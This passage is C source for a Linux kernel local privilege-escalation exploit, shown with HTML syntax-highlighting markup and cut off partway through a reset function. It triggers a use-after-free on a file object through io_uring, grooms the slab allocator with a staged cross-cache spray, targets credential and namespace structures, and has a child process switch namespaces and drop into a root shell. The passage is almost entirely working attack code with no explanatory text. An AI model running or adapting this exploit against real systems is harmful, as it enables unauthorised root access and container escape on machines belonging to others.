<span class="kt">uint64_t</span> <span class="n">g_nsproxy_what</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">g_cred_where</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">g_real_cred_where</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">g_nsproxy_where</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">g_files</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">g_fdt</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">g_file_array</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">g_file_addr</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">g_pipe_buf</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">g_scratch</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">g_fops</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="kt">void</span> <span class="nf">err</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">format</span><span class="p">,</span> <span class="p">...)</span>
<span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">format</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"%s"</span><span class="p">,</span> <span class="s">"[!] "</span><span class="p">);</span>
    <span class="kt">va_list</span> <span class="n">args</span><span class="p">;</span>
    <span class="n">va_start</span><span class="p">(</span><span class="n">args</span><span class="p">,</span> <span class="n">format</span><span class="p">);</span>
    <span class="n">vfprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="n">format</span><span class="p">,</span> <span class="n">args</span><span class="p">);</span>
    <span class="n">va_end</span><span class="p">(</span><span class="n">args</span><span class="p">);</span>
    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">": %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">strerror</span><span class="p">(</span><span class="n">errno</span><span class="p">));</span>

    <span class="n">sleep</span><span class="p">(</span><span class="mi">5</span><span class="p">);</span>
    <span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">info</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">format</span><span class="p">,</span> <span class="p">...)</span>
<span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">format</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span><span class="p">;</span>
    <span class="p">}</span>
    
    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"%s"</span><span class="p">,</span> <span class="s">"[*] "</span><span class="p">);</span>
    <span class="kt">va_list</span> <span class="n">args</span><span class="p">;</span>
    <span class="n">va_start</span><span class="p">(</span><span class="n">args</span><span class="p">,</span> <span class="n">format</span><span class="p">);</span>
    <span class="n">vfprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="n">format</span><span class="p">,</span> <span class="n">args</span><span class="p">);</span>
    <span class="n">va_end</span><span class="p">(</span><span class="n">args</span><span class="p">);</span>
    <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"%s"</span><span class="p">,</span> <span class="s">"</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Get FD for test file</span>
<span class="kt">int</span> <span class="nf">get_test_fd</span><span class="p">(</span><span class="kt">int</span> <span class="n">victim</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// These are just different for kernel debugging purposes</span>
    <span class="kt">char</span> <span class="o">*</span><span class="n">file</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">victim</span><span class="p">)</span> <span class="p">{</span> <span class="n">file</span> <span class="o">=</span> <span class="s">"/etc//passwd"</span><span class="p">;</span> <span class="p">}</span>
    <span class="k">else</span> <span class="p">{</span> <span class="n">file</span> <span class="o">=</span> <span class="s">"/etc/passwd"</span><span class="p">;</span> <span class="p">}</span>

    <span class="kt">int</span> <span class="n">fd</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="n">file</span><span class="p">,</span> <span class="n">O_RDONLY</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">fd</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"`open()` failed, file: %s"</span><span class="p">,</span> <span class="n">file</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="n">fd</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Set-up the file that we're going to use as our victim object</span>
<span class="kt">void</span> <span class="nf">alloc_victim_filp</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// Open file to register</span>
    <span class="n">g_uaf_fd</span> <span class="o">=</span> <span class="n">get_test_fd</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Victim fd: %d"</span><span class="p">,</span> <span class="n">g_uaf_fd</span><span class="p">);</span>

    <span class="c1">// Register the file</span>
    <span class="kt">int</span> <span class="n">ret</span> <span class="o">=</span> <span class="n">io_uring_register_files</span><span class="p">(</span><span class="o">&amp;</span><span class="n">g_ring</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">g_uaf_fd</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">ret</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"`io_uring_register_files()` failed"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Get hold of the sqe</span>
    <span class="k">struct</span> <span class="n">io_uring_sqe</span> <span class="o">*</span><span class="n">sqe</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
    <span class="n">sqe</span> <span class="o">=</span> <span class="n">io_uring_get_sqe</span><span class="p">(</span><span class="o">&amp;</span><span class="n">g_ring</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">sqe</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"`io_uring_get_sqe()` failed"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Init sqe vals</span>
    <span class="n">sqe</span><span class="o">-&gt;</span><span class="n">opcode</span> <span class="o">=</span> <span class="n">IORING_OP_MSG_RING</span><span class="p">;</span>
    <span class="n">sqe</span><span class="o">-&gt;</span><span class="n">fd</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="n">sqe</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">|=</span> <span class="n">IOSQE_FIXED_FILE</span><span class="p">;</span>

    <span class="n">ret</span> <span class="o">=</span> <span class="n">io_uring_submit</span><span class="p">(</span><span class="o">&amp;</span><span class="n">g_ring</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">ret</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"`io_uring_submit()` failed"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">struct</span> <span class="n">io_uring_cqe</span> <span class="o">*</span><span class="n">cqe</span><span class="p">;</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="n">io_uring_wait_cqe</span><span class="p">(</span><span class="o">&amp;</span><span class="n">g_ring</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">cqe</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Set CPU affinity for calling process/thread</span>
<span class="kt">void</span> <span class="nf">pin_cpu</span><span class="p">(</span><span class="kt">long</span> <span class="n">cpu_id</span><span class="p">)</span>
<span class="p">{</span>
    <span class="n">cpu_set_t</span> <span class="n">mask</span><span class="p">;</span>
    <span class="n">CPU_ZERO</span><span class="p">(</span><span class="o">&amp;</span><span class="n">mask</span><span class="p">);</span>
    <span class="n">CPU_SET</span><span class="p">(</span><span class="n">cpu_id</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">mask</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">sched_setaffinity</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">mask</span><span class="p">),</span> <span class="o">&amp;</span><span class="n">mask</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"`sched_setaffinity()` failed: %s"</span><span class="p">,</span> <span class="n">strerror</span><span class="p">(</span><span class="n">errno</span><span class="p">));</span>
    <span class="p">}</span>

    <span class="k">return</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Increase the number of FDs we can have open</span>
<span class="kt">void</span> <span class="nf">increase_fds</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">struct</span> <span class="n">rlimit</span> <span class="n">old_lim</span><span class="p">,</span> <span class="n">lim</span><span class="p">;</span>
	
	<span class="k">if</span> <span class="p">(</span><span class="n">getrlimit</span><span class="p">(</span><span class="n">RLIMIT_NOFILE</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">old_lim</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"`getrlimit()` failed: %s"</span><span class="p">,</span> <span class="n">strerror</span><span class="p">(</span><span class="n">errno</span><span class="p">));</span>
    <span class="p">}</span>
		
	<span class="n">lim</span><span class="p">.</span><span class="n">rlim_cur</span> <span class="o">=</span> <span class="n">old_lim</span><span class="p">.</span><span class="n">rlim_max</span><span class="p">;</span>
	<span class="n">lim</span><span class="p">.</span><span class="n">rlim_max</span> <span class="o">=</span> <span class="n">old_lim</span><span class="p">.</span><span class="n">rlim_max</span><span class="p">;</span>

	<span class="k">if</span> <span class="p">(</span><span class="n">setrlimit</span><span class="p">(</span><span class="n">RLIMIT_NOFILE</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">lim</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span>
    <span class="p">{</span>
		<span class="n">err</span><span class="p">(</span><span class="s">"`setrlimit()` failed: %s"</span><span class="p">,</span> <span class="n">strerror</span><span class="p">(</span><span class="n">errno</span><span class="p">));</span>
    <span class="p">}</span>

    <span class="n">info</span><span class="p">(</span><span class="s">"Increased fd limit from %d to %d"</span><span class="p">,</span> <span class="n">old_lim</span><span class="p">.</span><span class="n">rlim_cur</span><span class="p">,</span> <span class="n">lim</span><span class="p">.</span><span class="n">rlim_cur</span><span class="p">);</span>

    <span class="k">return</span><span class="p">;</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">create_pipe</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">pipe</span><span class="p">(</span><span class="n">g_pipe</span><span class="p">.</span><span class="n">fd</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"`pipe()` failed"</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">release_pipe</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="n">close</span><span class="p">(</span><span class="n">g_pipe</span><span class="p">.</span><span class="n">fd</span><span class="p">[</span><span class="n">PIPE_WRITE</span><span class="p">]);</span>
    <span class="n">close</span><span class="p">(</span><span class="n">g_pipe</span><span class="p">.</span><span class="n">fd</span><span class="p">[</span><span class="n">PIPE_READ</span><span class="p">]);</span>
<span class="p">}</span>

<span class="c1">// Our child waits to be given super powers and then drops into shell</span>
<span class="kt">void</span> <span class="nf">child_exec</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// Change our taskname </span>
    <span class="k">if</span> <span class="p">(</span><span class="n">prctl</span><span class="p">(</span><span class="n">PR_SET_NAME</span><span class="p">,</span> <span class="n">TARGET_TASK</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"`prctl()` failed"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">*</span><span class="p">(</span><span class="kt">int</span> <span class="o">*</span><span class="p">)</span><span class="n">g_shmem</span> <span class="o">==</span> <span class="mh">0x1337</span><span class="p">)</span>
        <span class="p">{</span>
            <span class="n">sleep</span><span class="p">(</span><span class="mi">3</span><span class="p">);</span>
            <span class="n">info</span><span class="p">(</span><span class="s">"Child dropping into root shell..."</span><span class="p">);</span>
            <span class="k">if</span> <span class="p">(</span><span class="n">setns</span><span class="p">(</span><span class="n">open</span><span class="p">(</span><span class="s">"/proc/self/ns/mnt"</span><span class="p">,</span> <span class="n">O_RDONLY</span><span class="p">),</span> <span class="mi">0</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">err</span><span class="p">(</span><span class="s">"`setns()`"</span><span class="p">);</span> <span class="p">}</span>
            <span class="k">if</span> <span class="p">(</span><span class="n">setns</span><span class="p">(</span><span class="n">open</span><span class="p">(</span><span class="s">"/proc/self/ns/pid"</span><span class="p">,</span> <span class="n">O_RDONLY</span><span class="p">),</span> <span class="mi">0</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">err</span><span class="p">(</span><span class="s">"`setns()`"</span><span class="p">);</span> <span class="p">}</span>
            <span class="k">if</span> <span class="p">(</span><span class="n">setns</span><span class="p">(</span><span class="n">open</span><span class="p">(</span><span class="s">"/proc/self/ns/net"</span><span class="p">,</span> <span class="n">O_RDONLY</span><span class="p">),</span> <span class="mi">0</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">err</span><span class="p">(</span><span class="s">"`setns()`"</span><span class="p">);</span> <span class="p">}</span>
            <span class="kt">char</span> <span class="o">*</span><span class="n">args</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span><span class="s">"/bin/sh"</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">};</span>
            <span class="n">execve</span><span class="p">(</span><span class="n">args</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">args</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
        <span class="p">}</span>

        <span class="k">else</span> <span class="p">{</span> <span class="n">sleep</span><span class="p">(</span><span class="mi">2</span><span class="p">);</span> <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c1">// Set-up environment for exploit</span>
<span class="kt">void</span> <span class="nf">setup_env</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// Make sure a page is a page and we're not on some bullshit machine</span>
    <span class="kt">long</span> <span class="n">page_sz</span> <span class="o">=</span> <span class="n">sysconf</span><span class="p">(</span><span class="n">_SC_PAGESIZE</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">page_sz</span> <span class="o">!=</span> <span class="mi">4096L</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Page size was: %ld"</span><span class="p">,</span> <span class="n">page_sz</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Pin to CPU 0</span>
    <span class="n">pin_cpu</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Pinned process to core-0"</span><span class="p">);</span>

    <span class="c1">// Increase FD limit</span>
    <span class="n">increase_fds</span><span class="p">();</span>

    <span class="c1">// Create shared mem</span>
    <span class="n">g_shmem</span> <span class="o">=</span> <span class="n">mmap</span><span class="p">(</span>
        <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="mh">0x1337000</span><span class="p">,</span>
        <span class="n">page_sz</span><span class="p">,</span>
        <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span><span class="p">,</span>
        <span class="n">MAP_ANONYMOUS</span> <span class="o">|</span> <span class="n">MAP_FIXED</span> <span class="o">|</span> <span class="n">MAP_SHARED</span><span class="p">,</span>
        <span class="o">-</span><span class="mi">1</span><span class="p">,</span>
        <span class="mi">0</span>
    <span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">g_shmem</span> <span class="o">==</span> <span class="n">MAP_FAILED</span><span class="p">)</span> <span class="p">{</span> <span class="n">err</span><span class="p">(</span><span class="s">"`mmap()` failed"</span><span class="p">);</span> <span class="p">}</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Shared memory @ 0x%lx"</span><span class="p">,</span> <span class="n">g_shmem</span><span class="p">);</span>

    <span class="c1">// Create child</span>
    <span class="n">g_child</span> <span class="o">=</span> <span class="n">fork</span><span class="p">();</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">g_child</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"`fork()` failed"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Child</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">g_child</span> <span class="o">==</span>  <span class="mi">0</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">child_exec</span><span class="p">();</span>
    <span class="p">}</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Spawned child: %d"</span><span class="p">,</span> <span class="n">g_child</span><span class="p">);</span>

    <span class="c1">// Change our name</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">prctl</span><span class="p">(</span><span class="n">PR_SET_NAME</span><span class="p">,</span> <span class="n">OUR_TASK</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"`prctl()` failed"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Create io ring</span>
    <span class="k">struct</span> <span class="n">io_uring_params</span> <span class="n">params</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">io_uring_queue_init_params</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">g_ring</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">params</span><span class="p">))</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"`io_uring_queue_init_params()` failed"</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Created io_uring"</span><span class="p">);</span>

    <span class="c1">// Create pipe</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Creating pipe..."</span><span class="p">);</span>
    <span class="n">create_pipe</span><span class="p">();</span>
<span class="p">}</span>

<span class="c1">// Decrement file-&gt;f_count to 0 and free the filp</span>
<span class="kt">void</span> <span class="nf">do_uaf</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">io_uring_unregister_files</span><span class="p">(</span><span class="o">&amp;</span><span class="n">g_ring</span><span class="p">))</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"`io_uring_unregister_files()` failed"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Let the free actually happen</span>
    <span class="n">usleep</span><span class="p">(</span><span class="mi">100000</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Cross-cache 1:</span>
<span class="c1">// Allocate enough objects that we have definitely allocated enough</span>
<span class="c1">// slabs to fill up the partial list later when we free an object from each</span>
<span class="c1">// slab</span>
<span class="kt">void</span> <span class="nf">cc_1</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// Calculate the amount of objects to spray</span>
    <span class="kt">uint64_t</span> <span class="n">spray_amt</span> <span class="o">=</span> <span class="p">(</span><span class="n">OBJS_PER_SLAB</span> <span class="o">*</span> <span class="p">(</span><span class="n">CPU_PARTIAL</span> <span class="o">+</span> <span class="mi">1</span><span class="p">))</span> <span class="o">*</span> <span class="n">OVERFLOW_FACTOR</span><span class="p">;</span>
    <span class="n">g_cc1_num</span> <span class="o">=</span> <span class="n">spray_amt</span><span class="p">;</span>

    <span class="c1">// Paranoid</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">spray_amt</span> <span class="o">&gt;</span> <span class="n">CROSS_CACHE_MAX</span><span class="p">)</span> <span class="p">{</span> <span class="n">err</span><span class="p">(</span><span class="s">"Illegal spray amount"</span><span class="p">);</span> <span class="p">}</span>

    <span class="c1">//info("Spraying %lu `filp` objects...", spray_amt);</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">spray_amt</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">g_cc1_fds</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">get_test_fd</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="n">usleep</span><span class="p">(</span><span class="mi">100000</span><span class="p">);</span>

    <span class="k">return</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Cross-cache 2:</span>
<span class="c1">// Allocate OBJS_PER_SLAB to *probably* create a new active slab</span>
<span class="kt">void</span> <span class="nf">cc_2</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// Step 2:</span>
    <span class="c1">// Allocate OBJS_PER_SLAB to *probably* create a new active slab</span>
    <span class="kt">uint64_t</span> <span class="n">spray_amt</span> <span class="o">=</span> <span class="n">OBJS_PER_SLAB</span> <span class="o">-</span> <span class="mi">1</span><span class="p">;</span>
    <span class="n">g_cc2_num</span> <span class="o">=</span> <span class="n">spray_amt</span><span class="p">;</span>

    <span class="c1">//info("Spraying %lu `filp` objects...", spray_amt);</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">spray_amt</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">g_cc2_fds</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">get_test_fd</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="n">usleep</span><span class="p">(</span><span class="mi">100000</span><span class="p">);</span>

    <span class="k">return</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Cross-cache 3:</span>
<span class="c1">// Allocate enough objects to definitely fill the rest of the active slab</span>
<span class="c1">// and start a new active slab</span>
<span class="kt">void</span> <span class="nf">cc_3</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">uint64_t</span> <span class="n">spray_amt</span> <span class="o">=</span> <span class="n">OBJS_PER_SLAB</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span>
    <span class="n">g_cc3_num</span> <span class="o">=</span> <span class="n">spray_amt</span><span class="p">;</span>

    <span class="c1">//info("Spraying %lu `filp` objects...", spray_amt);</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">spray_amt</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">g_cc3_fds</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">get_test_fd</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="n">usleep</span><span class="p">(</span><span class="mi">100000</span><span class="p">);</span>

    <span class="k">return</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Cross-cache 4:</span>
<span class="c1">// Free all the filps from steps 2, and 3. This will place our victim </span>
<span class="c1">// page in the partial list completely empty</span>
<span class="kt">void</span> <span class="nf">cc_4</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">//info("Freeing `filp` objects from CC2 and CC3...");</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">size_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">g_cc2_num</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">close</span><span class="p">(</span><span class="n">g_cc2_fds</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
    <span class="p">}</span>

    <span class="k">for</span> <span class="p">(</span><span class="kt">size_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">g_cc3_num</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">close</span><span class="p">(</span><span class="n">g_cc3_fds</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
    <span class="p">}</span>
    <span class="n">usleep</span><span class="p">(</span><span class="mi">100000</span><span class="p">);</span>

    <span class="k">return</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Cross-cache 5:</span>
<span class="c1">// Free an object for each slab we allocated in Step 1 to overflow the </span>
<span class="c1">// partial list and get our empty slab in the partial list freed</span>
<span class="kt">void</span> <span class="nf">cc_5</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">//info("Freeing `filp` objects to overflow CPU partial list...");</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">size_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">g_cc1_num</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">i</span> <span class="o">%</span> <span class="n">OBJS_PER_SLAB</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
        <span class="p">{</span>
            <span class="n">close</span><span class="p">(</span><span class="n">g_cc1_fds</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
        <span class="p">}</span>
    <span class="p">}</span>
    <span class="n">usleep</span><span class="p">(</span><span class="mi">100000</span><span class="p">);</span>

    <span class="k">return</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Reset all state associated with a cross-cache attempt</span>
<span class="kt">void</span> <span class="nf">cc_reset</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// Close all the remaining FDs</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Resetting cross-cache state..."</span><span class="p">);</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">size_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">CROSS_CACHE_MAX</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">close</span><span class="p">(</span><span class="n">g_cc1_fds</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
        <span class="n">close</span><span class="p">(</span><span class="n">g_cc2_fds</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
        <span class="n">close</span><span class="p">(</span><span class="n">g_cc3_fds</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
    <span class="p">}</span>

    <span class="c1">// Reset number trackers</span>
    <span class="n">g_cc1_num</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
